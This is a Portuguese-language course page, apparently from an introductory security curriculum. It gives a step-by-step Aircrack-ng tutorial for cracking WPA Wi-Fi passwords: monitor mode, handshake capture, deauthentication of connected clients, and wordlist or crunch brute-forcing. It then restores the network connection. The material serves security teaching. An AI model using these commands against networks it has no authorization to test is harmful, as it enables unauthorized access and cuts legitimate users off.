📖
Introducao à segurança digital
  • Introdução à Segurança Digital
  • Introdução a Linux
  • Criptografia
    • Introdução
    • Definições e Objetivos
    • Criptografia Clássica
    • Criptografia Moderna
    • Guia de Python para criptografia
  • Redes
    • Ataques
      • Arp Cache Poisoning
      • DNS Cache Poisoning
      • Slow Loris
      • Syn Flood
      • WPA Cracking
      • Deauth
    • Ferramentas
      • Resumo das Ferramentas
      • Suíte Aircrack
      • Wireshark
      • Netcat
      • Nmap
      • Netstat
      • Kathará
    • Pacote & Protocolo
    • Camada de Rede
    • Camada de Transporte
    • IANA
    • Three-way Handshake
    • DHCP
    • DNS
    • NAT
    • Pentest
      • FTP
      • SMB
      • SSH
      • VPN
    • Avançado
  • Web
    • Semana 1
      • Introdução à Web
      • Entendendo as URLs
      • Introdução ao HTML e ao CSS
      • Directory Traversal
      • Introdução ao Javascript
      • Cross Site Scripting (XSS)
      • Cookies e sessões
      • Protocolo HTTP
      • Protocolo HTTPS
      • 2020 - XML External Entities (XML) Injection
    • Semana 2
      • Servidores Web
      • PHP (Programação server-side)
      • Command Injection
      • Cookie Poisoning
      • Bancos de Dados
      • SQL Injection
      • Insecure Direct Object Reference (IDOR)
      • 2020 - Portas e Serviços
      • 2020 - API's e Serviços Rest
  • CTF
  • Engenharia Reversa
    • Arquivos
    • Registradores e tipos de dados
    • Hello World em x86
    • Pilha
    • GDB
    • Ghidra
  • Pwning
    • Integer Overflow
    • Buffer Overflow
    • Pwntools
    • Shellcode
    • Proteções
  • Hardware
    • Introdução ao Hardware Hacking
    • Introdução ao Infravermelho
Powered by GitBook
On this page
  • Escolhendo a interface de monitoramento
  • Airmon
  • Airodump
  • Aireplay
  • Aircrack
  • Crunch
  • Restaurando sua conexão

Was this helpful?

  1. Redes
  2. Ferramentas

Suíte Aircrack

PreviousResumo das FerramentasNextWireshark

Last updated 4 years ago

Was this helpful?

Aircrack-ng

Agora que já sabemos como funciona a teoria, para aplicar o WPA Attack utilizaremos o pacote de ferramentas , o qual pode ser instalado com:

sudo apt-get install -y aircrack-ng

Observação: Caso possua possua uma distro não debian-based, você pode instalar diretamente fonte seguindo essas .

Escolhendo a interface de monitoramento

Antes de começar o ataque em si, precisamos descobrir qual interface de rede utilizaremos para monitorar os pacotes em circulação:

iwconfig

Airmon

Depois, utilizando o airmon-ng podemos ergue-la em modo monitoramento:

airmon-ng check kill && sudo airmon-ng start <INTERFACE>

Airodump

Agora, podemos listar todos os wifis/pontos de acesso por meio dos pacotes que chegam até a interface:

sudo airodump-ng <INTERFACE>

Assim que o wifi que se deseja crackear aparecer na lista, podemos dar Ctrl+C para parar o airodump e salvar seu BSSID e CHANNEL. Em seguida, podemos inspecionar com mais precisão todos os pacotes que circulam por ele com:

sudo airodump-ng -w <OUTFILE> -c <CHANNEL> -bssid <BSSID> <INTERFACE>

Aireplay

Simultaneamente em outro terminal, podemos executar um deauthentication attack em alguns dos clientes da rede dado seu STATION_NUMBER:

sudo aireplay-ng --deauth <TIMES> -a <BSSID> -c <CLIENT_STATION_NUMEBR> <INTERFACE>

Aircrack

Por fim, agora que temos os handshakes, podemos usar o aircrack-ng para conseguir a senha de acesso utilizando alguma WORDLIST:

aircrack-ng <HANDSHAKE_FILE> -w <WORDLIST> -l <OUTFILE>

Crunch

Caso não queira usar um dicionário, podemos brutar todas as possibilidades de senhas utilizando o crunch

Primeiramente, para instalá-lo:

sudo apt-get install crunch

Agora, utilizando o aircrack em pipeline:

crunch <MIN> <MAX> <CHARSET> | aircrack-ng -b <BSSID> -w - <HANDSHAKE_FILE> -l <OUTFILE>

Para que sua internet volte a funcionar, temos que erguer a interface em modo normal e parar o monitoramento de pacotes:

sudo airmon-ng start <NORMAL_INTERFACE>
sudo airmon-ng stop <MON_INTERFACE>
ifconfig <NORMAL_INTERFACE> up
sudo service network-manager restart

NORMAL_INTERFACE diz respeito ao nome da interface sem o sufixo 'mon'

Observação: Existe mais de uma possibilidade para network manager, então o último comando pode variar de acordo com a distro instalada*

Vale ressaltar que assim que realizarmos esse passo, seu acesso à internet será cortado. Mas não se desespere! Se você seguir esse tutorial até o final, .Além disso, o nome de sua interface será acrescido do sufixo 'mon'.

Restaurando sua conexão
reestabeleceremos sua conexão
aircrack-ng
instruções